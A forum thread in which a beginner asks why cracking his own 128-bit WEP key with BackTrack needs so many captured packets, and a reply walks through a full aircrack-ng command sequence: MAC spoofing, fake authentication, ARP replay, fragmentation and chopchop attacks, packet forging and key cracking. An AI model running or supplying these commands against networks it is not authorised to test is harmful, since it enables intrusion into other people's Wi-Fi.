Thread: WEP Cracking long?

Just burned his ISO

Default WEP Cracking long?

Hello,

newbie here,

currently trying to crack my 128 bit wep, uses a pretty basic number password,

i am cracking it using backtrace 3, with aodump, airplay, aircrack

i guess what i am confused about is, i cracked it once roughly around 125k data points using the "-z" option.

everything i read said this should only take around 40-80k in points

but the next time i ran it, i got to 300k in points and it still wasn't cracked..???

i see a bunch of video's of people cracking 128bit in like 5 minutes.

it took over 20 some minutes to get 100k in data points and thats with injection and sitting a foot from the router?

any hints/help?

"One of the most magnificent features of an online forum is that as time goes by, there is generally more information available. What this means is that your best resource is the search feature. Most of the topics created on a daily basis have been addressed previously, you can learn more than you think by taking the time to search for your answer before posting your question. Doing things for yourself means taking the assembled body of knowledge on this forum and the Internet in general and applying it to your issue to learn something new. Before you ask a question, learn as much as you can about the issue so that your question is asked more intelligently." -theprez98

use this magical feature
    Remote Exploit Forums - Search Forums
    1000 times this topic has been covered.one of the most common question ever asked.

Just burned his ISO

Quote Originally Posted by Deadboy View Post
    "One of the most magnificent features of an online forum is that as time goes by, there is generally more information available. What this means is that your best resource is the search feature. Most of the topics created on a daily basis have been addressed previously, you can learn more than you think by taking the time to search for your answer before posting your question. Doing things for yourself means taking the assembled body of knowledge on this forum and the Internet in general and applying it to your issue to learn something new. Before you ask a question, learn as much as you can about the issue so that your question is asked more intelligently." -theprez98
    thought you were better then the other guy, i saw your original post where you thought about trying to help, guess the peer pressure of the other guy got the better of ya,

i have done searches, there is no magical search term, that is even coming close to my question being answered. but thats fine i kind of expect this.

personally i don't understand the point of a newbie forum, if all you guys post are stating search, u can have 1 sticky at the top and close the forum all together.

but anyway,

to any one who can help a tad, or at least more direction then simply "Search"

i am running BT3 Final, live cd via ram disk

some stated to update lastest suite of the ai suite

pretty much following

"How to Crack a Wi-Fi Network's WEP Password with BackTrack" (can't link url's apparently)

commands
    airmon-ng stop (interface)
    ifconfig (interface) down
    macchanger --mac 00:11:22:33:44:55 (interface)
    airmon-ng start (interface)
    airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
    aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
    aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
    aircrack-ng -z -b (bssid) (file name-01.cap)

also tried
    aircrack-ng -z -b (bssid) (file name-01.cap) -f 4

just not sure how people are cracking so fast and why i need so many more data points then the average

My apologies.

You'll generally get more overall speed running Backtrack from a hard drive install. And perhaps try with the latest edition of Backtrack (4 Pre-Final), then updating to the current version of aircrack-ng.

Bottom line is there can be alot of variables in play and it's difficult to discern the best course of action without as much information about the problem as possibile. There are many on the boards vastly more experienced with your specific question than and I could attempt answer. So on that note, best of luck to ya mate.
    "Why is it drug addicts and computer afficionados are both called users? "

I've got nothing better to do, I'll see if I can help..
    Quote Originally Posted by jxer21 View Post
    commands
    airmon-ng stop (interface)
    ifconfig (interface) down
    macchanger --mac 00:11:22:33:44:55 (interface)
    airmon-ng start (interface)
    airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
    If you're expecting a lot of data, dump the -w file on a mounted win drive ie airodump-ng -c <channel> -w /media/disk/filename --bssid <bssid> <interface>
    At this point, test your injection and see if everything's working ok.
    use
    aireplay-ng --test <interface>
    is injection working?

If no, fix it. If yes, then associate with your ap
    aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
    I usually use this:
    aireplay-ng -1 6000 -o 1 -q 10 -e <essid> -a <bssid> -h 00:11:22:33:44:55 <interface>

sends a keep alive packet
    Did you get a happy face when first associating?

If no, fix it. If yes, then continue

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
    If there's no data on the network, you probably wont get an arp packet, so the above line will be useless. You will have to build a packet, first try:

aireplay-ng -4 -b <bssid> -h 00:11:22:33:44:55 <interface>

yeah, no? then try:

aireplay-ng -5 -b <bssid> -h 00:11:22:33:44:55 <interface>

If this works, build your packet with:

packetforge-ng -0 -a <bssid> -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255.255 -y replay_packet.xor -w arp-request

then

replay the arp with:

aireplay-ng -2 -r arp-request <interface>

aircrack-ng -z -b (bssid) (file name-01.cap)

also tried
    aircrack-ng -z -b (bssid) (file name-01.cap) -f 4

just not sure how people are cracking so fast and why i need so many more data points then the average
    meh, I just use aircrack-ng /media/disk/filename*.cap usually takes about 40k data with bt4, probably more when it's 128bit. probably more if you're using an older aircrack version that doesn't use ptw

exploit made an excellent series of videos that explained everything above, you should probably watch them

edit: Just changed some stuff to work with bt4